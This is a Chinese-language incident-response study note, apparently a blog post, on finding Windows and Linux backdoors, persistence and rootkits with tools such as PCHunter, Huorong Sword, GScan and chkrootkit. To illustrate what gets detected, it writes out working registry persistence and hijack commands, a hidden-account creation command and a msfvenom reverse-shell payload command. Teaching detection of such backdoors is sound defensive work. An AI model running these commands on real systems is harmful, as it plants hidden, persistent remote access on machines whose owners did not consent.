目录
[案例一: Windows-后门-常规&权限维持&内存马](#案例一: Windows-后门-常规&权限维持&内存马)
案例一: Windows-后门-常规&权限维持&内存马
常规后门
常规msf后门,可以直接通过网络连接查看到
查看端口,就直接可以看到与别的主机建立了连接
利用火绒剑也可以查看连接,一般优先查看未知文件的连接,数字签名文件一般是有证书,如果免杀做的非常好,可以实现这一点
pchunter也可以查看不过不明显
权限维持
开机自启动
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe"
火绒剑启动项里面查看自启动文件
pchunter里面
创建隐藏账户
net user hacker$ hack!@#45 /add
pchunter中可以直接看到
可以直接删除
映像劫持
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc" #修改注册表
pchunter中
火绒剑
屏幕保护
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f #屏保
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\msf.exe" #远程登陆该计算机 启动shell
火绒启动中未知
pchunter中标为蓝色
内存马
基础检测这篇里面写过
第162天: 应急响应-网站入侵篡改指南&Webshell 内存马查杀&漏洞排查&时间分析-CSDN博客
在此基础之上补充一点,除了之前的那一种内存马,还有三种哥斯拉内存马
像这些写出来的,可以直接删除,而像瞎买按lister这个,就得使用类似headdump工具去进行一个手动分析
案例二:Linux-后门-常规&权限维持&Rootkit
常规
常规后门
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.172.130 LPORT=7777 -f elf >shell.elf
直接查看端口就可以
权限维持
工具下载地址:https://github.com/grayddq/GScan
设置两个权限维持,一个计时任务,一个alias执行命令,不会的看这篇文章
第145天:内网安全-Linux权限维持&Rootkit后门&Strace监控&Alias别名&Cron定时任务-CSDN博客
检测结果
rookit后门是写入了内核当中,用wireshark进行抓包都住不到。目前免费的系统都检测不到。只能是检测程序已经装好了,在监控的过程中发现了流量特征,有可能能够监控到
rookit复现案例:
第145天:内网安全-Linux权限维持&Rootkit后门&Strace监控&Alias别名&Cron定时任务-CSDN博客
rookit的检测工具:
Gscan也可以进行扫描
The Rootkit Hunter project
https://www.chkrootkit.org/